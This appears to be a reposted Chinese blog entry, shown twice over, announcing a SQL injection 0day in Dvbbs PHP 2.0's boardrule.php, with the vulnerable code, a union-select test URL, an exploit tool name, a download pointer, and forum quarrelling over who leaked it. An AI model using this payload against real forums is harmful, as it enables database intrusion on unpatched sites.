由Dvbbs PHP 0day引发的争论
生活随笔
收集整理的這篇文章主要介紹了
由Dvbbs PHP 0day引发的争论
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
由Dvbbs PHP 0day引發(fā)的爭(zhēng)論 昨天剛剛得到Dvbbs PHP 0day 的資料,看來(lái)還是晚了,今天無(wú)意間發(fā)現(xiàn)了有趣的事情,所以就給大家貼出來(lái)。呵呵
漏洞給大家播報(bào)下
================================================================
Dvbbs PHP 0day
影響版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息來(lái)源:零客網(wǎng)安 [url]www.0kee.com[/url]
--------------------分割JJ----------------------
相關(guān)代碼:
function brule() {
??? global $dv,$db,$boardid,$lang,$groupboardid;
??? $groupboardid=$_GET['groupboardid'];
??? if(!empty($_GET['groupboardid'])){
??????? $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");??
??? }
??? else{
??????? $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");???
??? }
直接獲得變量groupboardid,不為空就直接帶入查詢導(dǎo)致注入。
測(cè)試:[url]http://dvbbsroot/boardrule.php?groupboardid=111111111/[/url]**/union/**/select/**/version ()/*
利用工具 dvbbs_php2.0_fucker_.exe? MD5 : 6b931f8e00e90cf4b1faa531a59d4b36
=========================================================================================
(應(yīng)該是0DAY的發(fā)現(xiàn)者說(shuō)的,還有可能是零客的老大 下稱作者)題外話:這個(gè)0day作為內(nèi)部信息我只在10號(hào)那天在群共享里發(fā)了。
之前sniperhg本打算在清明節(jié)時(shí)發(fā)出來(lái),沒(méi)想到今天下午無(wú)意中在鬼仔的blog里看到了這個(gè)。
[url]http://www.huaidan.org/blog/article.asp?id=1767[/url]
文中除了把版權(quán)信息去掉了之外跟我在群里發(fā)的txt幾乎一個(gè)字都不帶差的。居然說(shuō)是揀的。 東西發(fā)就發(fā)了,無(wú)所謂,也不是多好的東西。
但是就這件事,我非常不爽。
是誰(shuí)泄露的,我早晚會(huì)查個(gè)水落石出。 論壇斑竹: ? 跟帖。。。 我X那個(gè)人。 鬼仔也不厚道~ 鬼仔: 。。。。。。
不是我不厚道,我是沒(méi)想那么多就發(fā)出來(lái)了。 不好意思。
作者: ? 說(shuō)實(shí)話
一定得查查誰(shuí)泄露的
和鬼仔沒(méi)關(guān)系
感覺(jué)自己內(nèi)部群里不應(yīng)該出現(xiàn)會(huì)泄露信息的人
我一直很相信自己人的
現(xiàn)在也不例外 鬼仔:
關(guān)于把版權(quán)信息去掉的問(wèn)題,是我確實(shí)不知道是你們這里的,我把你們版權(quán)信息加上了。 ? 內(nèi)部成員: ? 你還真會(huì)撿啊???/ 鬼仔: ? 我已經(jīng)道歉了,沒(méi)必要這樣了吧? 作者:
沒(méi)意見(jiàn)
看看蟑螂有何意見(jiàn)和想法 游客: 不是內(nèi)部泄露就是馬化騰個(gè)J8@! 小蟑螂:
事都過(guò)去了。
但是我希望你能告訴是誰(shuí)給你的。
OK的話就PM給我。不行就當(dāng)我沒(méi)說(shuō)。
我不希望這個(gè)人是我群里的。
? 呵呵,如果能聯(lián)想到一起,那么就更有趣了,最后總結(jié)一句話,什么事情就怕出內(nèi)奸,
?
關(guān)于發(fā)布的ODAY工具,網(wǎng)上的大都不能用 大家可以到?[url]http://www.520jsj.com[/url]上去下載,也可以到上面的官方去下載哦。 ?
漏洞給大家播報(bào)下
================================================================
Dvbbs PHP 0day
影響版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息來(lái)源:零客網(wǎng)安 [url]www.0kee.com[/url]
--------------------分割JJ----------------------
相關(guān)代碼:
function brule() {
??? global $dv,$db,$boardid,$lang,$groupboardid;
??? $groupboardid=$_GET['groupboardid'];
??? if(!empty($_GET['groupboardid'])){
??????? $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");??
??? }
??? else{
??????? $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");???
??? }
直接獲得變量groupboardid,不為空就直接帶入查詢導(dǎo)致注入。
測(cè)試:[url]http://dvbbsroot/boardrule.php?groupboardid=111111111/[/url]**/union/**/select/**/version ()/*
利用工具 dvbbs_php2.0_fucker_.exe? MD5 : 6b931f8e00e90cf4b1faa531a59d4b36
=========================================================================================
(應(yīng)該是0DAY的發(fā)現(xiàn)者說(shuō)的,還有可能是零客的老大 下稱作者)題外話:這個(gè)0day作為內(nèi)部信息我只在10號(hào)那天在群共享里發(fā)了。
之前sniperhg本打算在清明節(jié)時(shí)發(fā)出來(lái),沒(méi)想到今天下午無(wú)意中在鬼仔的blog里看到了這個(gè)。
[url]http://www.huaidan.org/blog/article.asp?id=1767[/url]
文中除了把版權(quán)信息去掉了之外跟我在群里發(fā)的txt幾乎一個(gè)字都不帶差的。居然說(shuō)是揀的。 東西發(fā)就發(fā)了,無(wú)所謂,也不是多好的東西。
但是就這件事,我非常不爽。
是誰(shuí)泄露的,我早晚會(huì)查個(gè)水落石出。 論壇斑竹: ? 跟帖。。。 我X那個(gè)人。 鬼仔也不厚道~ 鬼仔: 。。。。。。
不是我不厚道,我是沒(méi)想那么多就發(fā)出來(lái)了。 不好意思。
作者: ? 說(shuō)實(shí)話
一定得查查誰(shuí)泄露的
和鬼仔沒(méi)關(guān)系
感覺(jué)自己內(nèi)部群里不應(yīng)該出現(xiàn)會(huì)泄露信息的人
我一直很相信自己人的
現(xiàn)在也不例外 鬼仔:
關(guān)于把版權(quán)信息去掉的問(wèn)題,是我確實(shí)不知道是你們這里的,我把你們版權(quán)信息加上了。 ? 內(nèi)部成員: ? 你還真會(huì)撿啊???/ 鬼仔: ? 我已經(jīng)道歉了,沒(méi)必要這樣了吧? 作者:
沒(méi)意見(jiàn)
看看蟑螂有何意見(jiàn)和想法 游客: 不是內(nèi)部泄露就是馬化騰個(gè)J8@! 小蟑螂:
事都過(guò)去了。
但是我希望你能告訴是誰(shuí)給你的。
OK的話就PM給我。不行就當(dāng)我沒(méi)說(shuō)。
我不希望這個(gè)人是我群里的。
? 呵呵,如果能聯(lián)想到一起,那么就更有趣了,最后總結(jié)一句話,什么事情就怕出內(nèi)奸,
?
關(guān)于發(fā)布的ODAY工具,網(wǎng)上的大都不能用 大家可以到?[url]http://www.520jsj.com[/url]上去下載,也可以到上面的官方去下載哦。 ?
轉(zhuǎn)載于:https://blog.51cto.com/blacksnow/65986
總結(jié)
以上是生活随笔為你收集整理的由Dvbbs PHP 0day引发的争论的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: java已被弱化签名,高效Java第四十
- 下一篇: python函数的继承_Python 继